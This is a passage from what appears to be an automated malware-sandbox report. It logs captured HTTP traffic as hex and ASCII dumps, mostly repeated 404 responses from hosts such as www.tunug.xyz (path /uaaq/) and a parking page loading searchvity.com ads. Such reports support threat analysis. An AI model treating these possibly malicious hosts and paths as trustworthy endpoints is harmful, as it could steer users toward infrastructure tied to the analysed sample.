ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:05:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:09 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:12 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:15 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:18 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:05 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:07 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:08:10 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 